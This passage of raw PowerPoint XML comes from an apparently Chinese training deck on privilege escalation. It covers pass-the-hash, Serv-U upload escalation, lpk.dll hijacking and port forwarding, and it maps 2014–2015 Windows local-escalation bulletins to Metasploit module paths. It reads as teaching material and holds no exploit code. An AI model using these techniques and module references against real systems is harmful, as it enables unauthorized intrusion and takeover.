              <a:t>本地溢出：本地溢出提权首先要有服务器的一个用户，且需要有执行的权限的用户才能发起提权，攻击者通常会向服务器上传本地溢出程序，在服务器端执行，如果系统存在漏洞，那么将溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>权限。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112BD615-67C0-49A9-8F43-66F85D61E9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182149" y="4663484"/>
            <a:ext cx="11827702" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Getpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>提权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一个功能函数，可用多种程序实现，功能为提取口令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中有单独的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>getpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（详情请看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序设计）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372912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二、提权准备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1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Hsah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>传递入侵</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统中，系统通常不会存储用户登录密码，而是存储密码的哈希值，在我们远程登录系统的时候，实际上向远程传递的就是密码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>值。当攻击者获取了存储在计算机上的用户名和密码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>值的时候，他虽然不知道密码值，但是仍然可以通过直接连接远程主机，通过传送密码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>值来达到登录的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112BD615-67C0-49A9-8F43-66F85D61E9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="3683770"/>
            <a:ext cx="11827702" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(2)	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第三方软件提权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Serv-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>提权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Serv-U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>平台和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>平台的安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FTPS, SFTP, HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），是一个优秀的、安全的文件管理、文件传输和文件共享的解决方案。同时也是应用最广泛的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用该平台文件上传漏洞，并能以系统用户身份执行远程代码，成功完成操作系统提权。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387272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二、提权准备</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2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Lpk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>提权 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统本身的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件位于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C:\WINDOWS\system32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C:WINDOWS\system\dllcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>病毒的典型特征是感染存在可执行文件的目录，并隐藏自身，删除后又再生成，当同目录中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件运行时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>动态链接，从而激活病毒，进而导致不能彻底清除。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lpk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TOOls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>工具生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上传到目标服务器带有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的目录下，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>被执行后，就会动态链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>lpk.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，映像劫持技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112BD615-67C0-49A9-8F43-66F85D61E9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="4047664"/>
            <a:ext cx="11827702" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(3)	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★端口转发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口转发（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Port forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），有时被叫做隧道，是安全壳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(SSH) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为，其使一个外部用户从外部经过一个被激活的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>路由器到达一个在私有内部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址（局域网内部）上的一个端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162029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三、本地溢出漏洞及对应版本</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5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年对应漏洞、编号及其影响系统和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB 2914368 MS14-002 Windows XP SP3. Windows XP 64 SP2. Windows Server 2003 32-64 SP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ms_ndproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB 2916607|MS14-009 Windows Server 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 R232-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms14_009_ie_dfsvc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB 3000061|MS14-058 Windows Server 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 R2 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2 exploit/windows/local/ms14 _058_ track_ popup_ menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>KB 2989935|MS14-070 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2003 32-64 SP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms14_ 070_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>tcpip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ioctl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264605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三、本地溢出漏洞及对应版本</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524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年对应漏洞、编号及其影响系统和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3023266|MS15-001 Windows 7 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 R2 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 R2 64 SP1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 8-8.1 32-64. </a:t>
            </a:r>
            <a:r>
